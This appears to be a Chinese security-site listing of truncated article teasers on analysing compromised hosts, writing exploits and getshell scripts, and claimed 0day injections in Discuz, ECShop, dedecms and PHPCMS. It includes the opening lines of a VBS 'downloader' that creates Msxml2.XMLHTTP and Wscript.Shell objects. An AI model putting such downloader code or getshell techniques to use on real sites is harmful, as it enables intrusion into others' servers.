对我⽅已拿下的攻击方⾁鸡进⾏⽇志、⽂件等分析,发现⼤部分肉鸡的网站根目录都存在 images.php,提取该文件的内容并分析:
gh0st_cn
gh0st_cn
moonsec_com
application/json 四种常见的 POST 提交数据方式
HTTP/1.1 协议 规定的 HTTP 请求方法有 OPTIONS、GET、HEAD、POST、PUT、DELETE、TRACE、CONNECT 这几种。其中 PO...
moonsec_com
WEB安全第七章exp编写三
WEB安全第七章exp编写三 GETSHELL编写 上篇 我教大家编写了一个post注入的exp ,这一节同样也是关于post提交,很多同学都喜欢GETHSELL ,怎么写GETH...
moonsec_com
WEB安全第七章exp编写二
WEB安全第七章exp编写二 POST注入exp编写 上一篇 WEB安全第七章exp编写一 简单的exp编写 编写的exp比较简单,这一篇将会提高难度,将会编写复杂一些的exp。
moonsec_com
CI框架中的SQL注入隐患
在CI 框架中,获取 get 和 post 参数是使用了 $this->input 类中的 get 和 post 方法。
moonsec_com
DZ6.x的UC_KEY getwebshell exploit
网上有dz 7.x和dz x系列的uc_key 利用方式,今天遇到了一个dz6.0的网站,于是分析了下代码,改了下利用程序,分享给需要的人。uc_key getshell 是一个影...
moonsec_com
Discuz! X系列远程代码执行漏洞分析
上周有一个朋友问我有没有办法在知道uc的appkey的情况下getshell,刚好我在原来看discuz代码时曾经有过几个相关的想法,但是一直没有仔细去看,接着这个机会去看了下,果...
moonsec_com
ECShop V2.7.3 GBK release1106注入0day
C0deplay Team j8g 看代码 /* 修改个人资料的处理 */ elseif ($action == 'act_...
moonsec_com
(首发)dedecms 5.7 最新漏洞(绝非网上公布的)
请看看文件:include/filter.inc.php 引用一哥话语: 这是2B的dede再次变量覆盖漏洞根源。。 这是过滤或替换非法关键字。正常的。 /* 对_GET,_POST,_COOKIE进...
moonsec_com
vbs下载者
一、VBS下载者: Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.O...
moonsec_com
2.0 任意文件删除漏洞
微博求关注啊 http://1.t.qq.com/x0h4ck3r
moonsec_com
PHPCMS V9 视频分享模块SQL注射漏洞分析
其实这个0day前几天就发现了,只是今天放出来是因为我最重要的人。。 http://www.cnblogs.com/y0umer/archive/2012/12/25/2...
